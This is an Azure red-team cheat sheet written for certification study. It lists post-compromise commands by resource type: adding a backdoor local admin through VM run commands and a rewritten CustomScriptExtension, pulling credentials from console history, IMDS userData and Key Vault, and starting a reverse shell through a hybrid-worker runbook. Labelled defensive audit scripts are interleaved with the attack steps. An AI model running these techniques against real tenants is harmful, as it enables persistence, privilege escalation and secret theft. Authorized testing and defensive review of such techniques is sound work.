[Azure] What To Do If?

"What To Do If" is a blog that will be updated continuously with practical information about exploiting Azure Cloud resources.

Last update: July 23, 2024

Hi there! In this blog, as its title says, we will answer the question "What to do if you found resource XYZ in Azure?" It's very simple and will be updated continuously with the latest commands, tools, and more. I used this guide to pass the CARTP (Certified Azure Red Team Professional) certification from Altered Security, so thanks to them, especially Nikhil, for the great content.

For example, if you have an assessment in an Azure environment and you gain access to a specific account or application managed identity, what's the first step you will take? What are you going to do if you find yourself with a specific role assignment on a virtual machine or key vault? That's exactly what we will discuss here, so let's get started...

All the following steps are circular, not sequential: if you log in, follow the steps, find leaked credentials and log in again as the new user, you may need to follow the same steps from the beginning again, depending on the resources you have.


Content

  1. Used Tools

  2. Azure AD user account & Managed Identity.

  3. Virtual Machine & Extensions

  4. KeyVaults

  5. Storage Blob & Storage Accounts

  6. Automation Account


Used Tools

The tool we will depend on most is Az PowerShell, but we will use different tools for specific tasks, and we will add them here to collect them in one section.

Az Powershell

Install-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force

Az CLI

Download and install it from here


Azure AD user account & Managed Identity

This is your first step in any assessment: having an account or managed identity with specific roles. Azure pentesting is unlike a normal website pentest; it is closer to a configuration review than to red teaming an on-prem environment. So, once you get an account, follow these steps to learn your roles and the resources you have access to.

  1. Login using Az PowerShell:

     $passwd = ConvertTo-SecureString "pass@1234" -AsPlainText -Force
     $creds = New-Object System.Management.Automation.PSCredential ("test@aykalam.onmicrosoft.com", $passwd)
     Connect-AzAccount -Credential $creds

  2. Check Get-AzResource to know the resources you have access to.

  3. Check Get-AzRoleAssignment to know the roles you have on a specific resource.

  4. Check the objects owned by the user using the Az CLI: az ad signed-in-user list-owned-objects

  5. Check if we have storage accounts / blobs using the MicroBurst scripts.

  6. Try to log in to the Azure portal and check the Deployment history.

  7. Try to log in to the Azure portal and, if you have a Dynamic Group, try to invite other users.

  8. If you aren't able to log in to the Azure portal due to an access policy, check the following solutions:

    + Try to log in using the Az CLI, Az PowerShell, or AzureAD tools.

    + Try to change the user-agent in the browser to any other device (maybe access is allowed only for specific devices).
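The enumeration steps above are what an access review of a single identity boils down to. The following script is an added example, not code from the original post: it lists every role assignment of the signed-in user (including those inherited through groups), marks the ones that carry write or access-management power, and shows how broadly each is scoped. It assumes Connect-AzAccount has already been run as a user account; the list of roles treated as high-privilege is this example's own choice.

```powershell
# Added example (not from the original post): review what the signed-in identity can reach
# and where its roles are scoped, so that over-broad assignments stand out.
# Assumes Connect-AzAccount has already been run as a user account. The set of roles
# treated as high-privilege below is this example's own choice, not an Azure list.
$privilegedRoles = @(
    'Owner', 'Contributor', 'User Access Administrator',
    'Virtual Machine Contributor', 'Key Vault Administrator',
    'Key Vault Secrets Officer', 'Storage Blob Data Contributor',
    'Automation Contributor'
)

$ctx = Get-AzContext
if (-not $ctx) { throw 'Not signed in: run Connect-AzAccount first.' }
if ($ctx.Account.Type -ne 'User') {
    Write-Warning "Signed in as $($ctx.Account.Type); -SignInName only resolves user accounts."
}

# Direct assignments plus the ones inherited through group membership.
$assignments = Get-AzRoleAssignment -SignInName $ctx.Account.Id -ExpandPrincipalGroups

$report = foreach ($a in $assignments) {
    # Fewer path segments in the scope means the role applies to more resources.
    $level = switch -Regex ($a.Scope) {
        '^/$'                                         { 'Root' }
        '^/subscriptions/[^/]+$'                      { 'Subscription' }
        '^/subscriptions/[^/]+/resourceGroups/[^/]+$' { 'ResourceGroup' }
        default                                       { 'Resource' }
    }
    [pscustomobject]@{
        Role       = $a.RoleDefinitionName
        Privileged = $privilegedRoles -contains $a.RoleDefinitionName
        Level      = $level
        Scope      = $a.Scope
    }
}

$report | Sort-Object Privileged, Level -Descending | Format-Table -AutoSize

# Resources this identity can see, counted by type, to compare against the roles above.
Get-AzResource | Group-Object ResourceType | Sort-Object Count -Descending |
    Select-Object Count, Name
```

A Privileged=True row at Subscription or ResourceGroup level is the finding to write up: the page's later sections (VM run commands, extensions, Key Vault secrets, runbooks) all start from exactly such an assignment.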


Virtual Machine & Extensions

Check the VM network profile and IP

  1. Run Get-AzResource

  2. Run Get-AzRoleAssignment, because you need at least read access to the VM and its network profile.

  3. Check the roles you have on this VM from the above call to learn your permissions.

  4. Get the network profile name: Get-AzVM -Name VMName -ResourceGroupName RGName | select -ExpandProperty NetworkProfile

  5. Get the interface name: Get-AzNetworkInterface -Name InterfaceName

  6. Get the public IP: Get-AzPublicIpAddress -Name IPAddressName
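Steps 4 to 6 above are one chain: VM, network profile, interface, public IP. The script below is an added example (not from the original post) that walks that chain for every VM in the subscription and reports which machines expose a public address and whether a network security group is attached to the NIC, which is the inventory a defender wants before any of the later VM techniques matter. It assumes Connect-AzAccount has been run with at least Reader on the VMs, NICs and public IPs; the helper Get-ResourceNameFromId is this example's own.

```powershell
# Added example (not from the original post): resolve VM -> NIC -> public IP for every VM
# so that internet-reachable machines can be reviewed. Assumes Reader on VMs, NICs and IPs.

function Get-ResourceNameFromId {
    # Azure resource IDs look like
    # /subscriptions/<sub>/resourceGroups/<rg>/providers/<namespace>/<type>/<name>
    param([string]$Id)
    $parts = $Id -split '/'
    [pscustomobject]@{
        ResourceGroupName = $parts[4]
        Name              = $parts[-1]
    }
}

$rows = foreach ($vm in Get-AzVM) {
    foreach ($nicRef in $vm.NetworkProfile.NetworkInterfaces) {
        $nic = Get-AzNetworkInterface -ResourceId $nicRef.Id
        foreach ($ipcfg in $nic.IpConfigurations) {
            $publicIp = $null
            if ($ipcfg.PublicIpAddress) {
                $ref = Get-ResourceNameFromId -Id $ipcfg.PublicIpAddress.Id
                $publicIp = (Get-AzPublicIpAddress -ResourceGroupName $ref.ResourceGroupName -Name $ref.Name).IpAddress
            }
            [pscustomobject]@{
                VM        = $vm.Name
                RG        = $vm.ResourceGroupName
                NIC       = $nic.Name
                PrivateIP = $ipcfg.PrivateIpAddress
                PublicIP  = $publicIp
                NicNSG    = if ($nic.NetworkSecurityGroup) { ($nic.NetworkSecurityGroup.Id -split '/')[-1] } else { '(none)' }
            }
        }
    }
}

$rows | Format-Table -AutoSize

# VMs with a public IP and no NIC-level NSG deserve a second look (a subnet NSG may still apply).
$rows | Where-Object { $_.PublicIP -and $_.NicNSG -eq '(none)' }
```

A dynamic public IP on a deallocated VM shows up without an address; that is expected and not an error in the chain.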

If you have a Command Executer role

Run ready-made scripts directly to add a user

Invoke-AzVMRunCommand -VMName VMName -ResourceGroupName RGName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\path\to\your\script' -Verbose

# content of the script file
$passwd = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
New-LocalUser -Name username -Password $passwd
Add-LocalGroupMember -Group Administrators -Member username

Connect using the created account

$password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('username', $password)
$sess = New-PSSession -ComputerName 10.20.30.40 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess

# After connecting, get the hostname and username of the machine
hostname
Get-LocalUser

# In case you find credentials, use the following command to authenticate
$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('emailuser@ayhags.onmicrosoft.com', $password)
Connect-AzAccount -Credential $creds

Extract credentials from console history (after gaining a shell)

cat C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Check if there's any User Data stored in the machine (after gaining a shell)

$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))

Try the PowerShell transcripts (after gaining a shell)

cat C:\Transcripts\<id>\PowerShell_transcript.DESKTOP-M7C1AFM.6sZJrDuN.<id>.txt

Dealing with extensions if you have read or write permission

# Check if the extensions are installed
Get-AzVMExtension -ResourceGroupName "RGName" -VMName "VMName"

# We will be unable to create a new extension, but we can modify the "commandToExecute" to add our own local user
Set-AzVMExtension -ResourceGroupName "RGName" -ExtensionName "ExecCmd" -VMName "VMName" -Location "Location" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users <your-username> <password> /add /Y; net localgroup administrators <your-username> /add"}'
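Because the Custom Script Extension settings are readable with VM read permission, the same call that an attacker uses to plan the change above also lets a defender audit it. The script below is an added example, not from the original post: it walks every VM, reads the public settings of script-running extensions and flags commandToExecute values that look like local account manipulation. It assumes Reader on the VMs; the pattern list is this example's own and not an Azure feature. Settings placed in protectedSettings are not returned by the API and so cannot be inspected this way.

```powershell
# Added example (not from the original post): flag CustomScriptExtension settings whose
# commandToExecute looks like local account manipulation, the technique described above.
# Assumes Reader on the VMs. The pattern list is this example's own, not an Azure feature.
$suspicious = 'net\s+user', 'net\s+localgroup', 'New-LocalUser', 'Add-LocalGroupMember',
              'IEX', 'Invoke-Expression', 'DownloadString'

$findings = foreach ($vm in Get-AzVM) {
    $exts = Get-AzVMExtension -ResourceGroupName $vm.ResourceGroupName -VMName $vm.Name
    foreach ($ext in $exts) {
        # Only script-running extensions matter here (Windows: CustomScriptExtension, Linux: CustomScript).
        if ($ext.ExtensionType -notmatch 'CustomScript') { continue }

        # PublicSettings is the settings JSON as a string; commandToExecute lives there when not protected.
        $cmd = $null
        if ($ext.PublicSettings) {
            $settings = $ext.PublicSettings | ConvertFrom-Json
            $cmd = $settings.commandToExecute
        }

        $matched = @()
        foreach ($p in $suspicious) { if ($cmd -match $p) { $matched += $p } }

        [pscustomobject]@{
            VM        = $vm.Name
            RG        = $vm.ResourceGroupName
            Extension = $ext.Name
            Type      = $ext.ExtensionType
            State     = $ext.ProvisioningState
            Command   = $cmd
            Flags     = ($matched -join ', ')
        }
    }
}

$findings | Format-Table -AutoSize

# The rows worth investigating: cross-check them against Activity Log write events on the VM.
$findings | Where-Object { $_.Flags }
```

An extension with an empty Command but a recent ProvisioningState change is also worth a look, since the command may sit in protectedSettings; the Azure Activity Log still records who wrote the extension and when.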

If you find yourself on the Azure AD Connect machine (synced with on-prem), try to reset the Sync_ account

# Check if you are on the Azure AD Connect machine; this module is installed by default on any Connect machine
Get-ADSyncConnector

KeyVault

First, we check whether we have access to any key vaults; if we do, we try to get their secrets and read them as plain text. It's very simple.

Get-AzKeyVault
Vault Name: ResearchKeyVault

Get-AzKeyVaultSecret -VaultName ResearchKeyVault
Name: researchkeyvault

Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
username: accountName@ayhags.onmicrosoft.com ; password:adfa@asdfa$#*!@#
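Reading a secret as plain text succeeds whenever the identity holds a get/list secrets permission on the vault, so the defensive question is who holds that and whether the vault's protective settings are on. The script below is an added example (not from the original post) that, for each vault, prints the RBAC/soft-delete/purge-protection/network settings and then lists the principals able to read secrets under whichever permission model the vault uses. It assumes Reader on the vaults and that the Az.KeyVault module is loaded; the permission names 'all', 'get' and 'list' are the Key Vault access-policy values.

```powershell
# Added example (not from the original post): review who can read secrets from each vault
# and whether the safety settings are on. Assumes Reader on the vaults.
$readSecrets = 'all', 'get', 'list'   # access-policy permissions that expose secret values

foreach ($kv in Get-AzKeyVault) {
    # The listing returns a summary object; the full object carries policies and settings.
    $v = Get-AzKeyVault -VaultName $kv.VaultName -ResourceGroupName $kv.ResourceGroupName

    [pscustomobject]@{
        Vault             = $v.VaultName
        RbacAuthorization = $v.EnableRbacAuthorization
        SoftDelete        = $v.EnableSoftDelete
        PurgeProtection   = $v.EnablePurgeProtection
        NetworkDefault    = $v.NetworkAcls.DefaultAction   # 'Allow' means reachable from any network
    } | Format-List

    if (-not $v.EnableRbacAuthorization) {
        # Legacy access-policy model: every entry below can read secrets as plain text.
        $v.AccessPolicies |
            Where-Object {
                @($_.PermissionsToSecrets | ForEach-Object { $_.ToLower() } |
                  Where-Object { $readSecrets -contains $_ }).Count -gt 0
            } |
            Select-Object DisplayName, ObjectId, @{n='Secrets'; e={ $_.PermissionsToSecrets -join ',' }} |
            Format-Table -AutoSize
    } else {
        # RBAC model: data-plane roles assigned at the vault scope (inherited ones included).
        Get-AzRoleAssignment -Scope $v.ResourceId |
            Where-Object { $_.RoleDefinitionName -like 'Key Vault*' } |
            Select-Object DisplayName, ObjectType, RoleDefinitionName, Scope |
            Format-Table -AutoSize
    }
}
```

A vault with NetworkDefault = Allow, RBAC off and a broad access policy is the configuration that makes the three commands above work from any workstation; the fix is to move to RBAC, scope the secrets roles to the application identity only, and restrict the network rule set.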

Storage Blob / Accounts

Enumerate storage blobs using MicroBurst

. C:\AzAD\Tools\MicroBurst\Misc\Invoke-EnumerateAzureBlobs.ps1
Invoke-EnumerateAzureBlobs -Base <tenantName>

If you find a container, try to access its blobs by appending the value of each <Name></Name> tag from the listing to the container URL endpoint.

Check Containers

If you find that your user has access to the storage account, check whether there is a container the user has access to.

PS C:\AzAD\Tools> Get-AzResource
Name: RName
ResourceGroupName: RGName
ResourceType: Microsoft.Storage/storageAccounts

PS C:\AzAD\Tools> Get-AzStorageContainer -Context (New-AzStorageContext -StorageAccountName <SAName>)
# After that, if you found a container, log in with the account you have to the Storage Explorer via the Subscription tab

If you find a SAS URL or account credentials with access to Storage Blob, open the Storage Explorer application and authenticate using the SAS URL or the account.
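The MicroBurst enumeration above only pays off when a container allows anonymous access, and the account-credential path only when shared-key access is still enabled. The script below is an added example (not from the original post) that reports both settings for every storage account and container the identity can see. It assumes Connect-AzAccount has been run with Reader on the storage accounts and a data-plane role such as Storage Blob Data Reader for listing containers; accounts where listing fails are skipped rather than treated as safe.

```powershell
# Added example (not from the original post): find containers that allow anonymous access and
# accounts that still accept shared keys, the conditions behind the enumeration above.
# Assumes Reader on the accounts plus a blob data role for listing containers.
$rows = foreach ($sa in Get-AzStorageAccount) {
    # Entra ID (connected account) context, so no account key is needed.
    $ctx = New-AzStorageContext -StorageAccountName $sa.StorageAccountName -UseConnectedAccount
    $containers = try { Get-AzStorageContainer -Context $ctx -ErrorAction Stop } catch {
        Write-Warning "Cannot list containers in $($sa.StorageAccountName): $($_.Exception.Message)"
        @()
    }
    foreach ($c in $containers) {
        [pscustomobject]@{
            Account                = $sa.StorageAccountName
            Container              = $c.Name
            ContainerPublicAccess  = $c.PublicAccess              # Off, Blob or Container
            AccountAllowsAnonymous = $sa.AllowBlobPublicAccess    # $null means the older default (allowed)
            SharedKeyAllowed       = $sa.AllowSharedKeyAccess     # $null means allowed
            HttpsOnly              = $sa.EnableHttpsTrafficOnly
        }
    }
}

$rows | Format-Table -AutoSize

# Anonymous listing or reading works only when both the account and the container allow it.
$rows | Where-Object { $_.AccountAllowsAnonymous -ne $false -and $_.ContainerPublicAccess -ne 'Off' }
```

ContainerPublicAccess = Container is the case MicroBurst's Invoke-EnumerateAzureBlobs finds (the listing itself is anonymous); Blob allows anonymous reads of known blob names only.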


Automation Account

Check your permissions over the automation account

Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<RGName>/providers/Microsoft.Automation/automationAccounts/HybridAutomation

Check whether a hybrid worker is in use in the automation account

PS C:\AzAD\Tools> Get-AzAutomationHybridWorkerGroup -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam
ResourceGroupName     : AyKalam
AutomationAccountName : HybridAutomation
Name                  : Workergroup1
RunbookWorker         : {}
GroupType             : User

Gain reverse shell access

Import a PowerShell runbook file to download a reverse shell from your host machine and run it on the hybrid worker.

# Import the runbook file 
# filename.ps1 is any powershell reverse shell command. 
Import-AzAutomationRunbook -Name <RBName> -Path C:\Tools\filename.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Type PowerShell -Force -Verbose

# publish the runbook 
Publish-AzAutomationRunbook -RunbookName <RBName> -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Verbose

# run your netcat listener
nc.exe -lvp 4444

# Start the runbook 
Start-AzAutomationRunbook -RunbookName <RBName> -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Verbose
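The three calls above leave a clear trail: a new runbook, a publish, and a job started with -RunOn against a hybrid worker group. The script below is an added example, not from the original post, that reviews every Automation account for its hybrid worker groups, the identities whose roles let them import or start runbooks at that scope, and runbooks modified in the last week. It assumes Reader on the Automation accounts and a signed-in Az context; the list of roles treated as able to run runbooks is this example's own choice.

```powershell
# Added example (not from the original post): review Automation accounts for hybrid worker
# groups, who can create or start runbooks there, and recently changed runbooks.
# Assumes Reader on the Automation accounts. The role list is this example's own choice.
$canRunRunbooks = 'Owner', 'Contributor', 'Automation Contributor',
                  'Automation Operator', 'Automation Job Operator'
$subId = (Get-AzContext).Subscription.Id

foreach ($aa in Get-AzAutomationAccount) {
    "== $($aa.AutomationAccountName) ($($aa.ResourceGroupName))"

    # Hybrid worker groups: a runbook started with -RunOn executes on these hosts under the
    # worker service's own account, outside Azure's sandbox.
    Get-AzAutomationHybridWorkerGroup -AutomationAccountName $aa.AutomationAccountName `
                                      -ResourceGroupName $aa.ResourceGroupName |
        Select-Object Name, GroupType,
                      @{n='Workers'; e={ ($_.RunbookWorker | ForEach-Object { $_.Name }) -join ',' }} |
        Format-Table -AutoSize

    # Identities able to import, publish or start runbooks at this scope (inherited roles included).
    $scope = "/subscriptions/$subId/resourceGroups/$($aa.ResourceGroupName)" +
             "/providers/Microsoft.Automation/automationAccounts/$($aa.AutomationAccountName)"
    Get-AzRoleAssignment -Scope $scope |
        Where-Object { $canRunRunbooks -contains $_.RoleDefinitionName } |
        Select-Object DisplayName, ObjectType, RoleDefinitionName, Scope |
        Format-Table -AutoSize

    # Runbooks changed in the last 7 days: an unexpected one is the artefact of the technique above.
    Get-AzAutomationRunbook -AutomationAccountName $aa.AutomationAccountName `
                            -ResourceGroupName $aa.ResourceGroupName |
        Where-Object { $_.LastModifiedTime -gt (Get-Date).AddDays(-7) } |
        Select-Object Name, RunbookType, State, LastModifiedTime |
        Format-Table -AutoSize
}
```

Pairing the recently modified runbooks with Get-AzAutomationJob output for the same account shows whether any of them was actually started on a hybrid worker group.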

To be continued...

Thanks for reading <3 Stay in touch

LinkedIn | GitHub
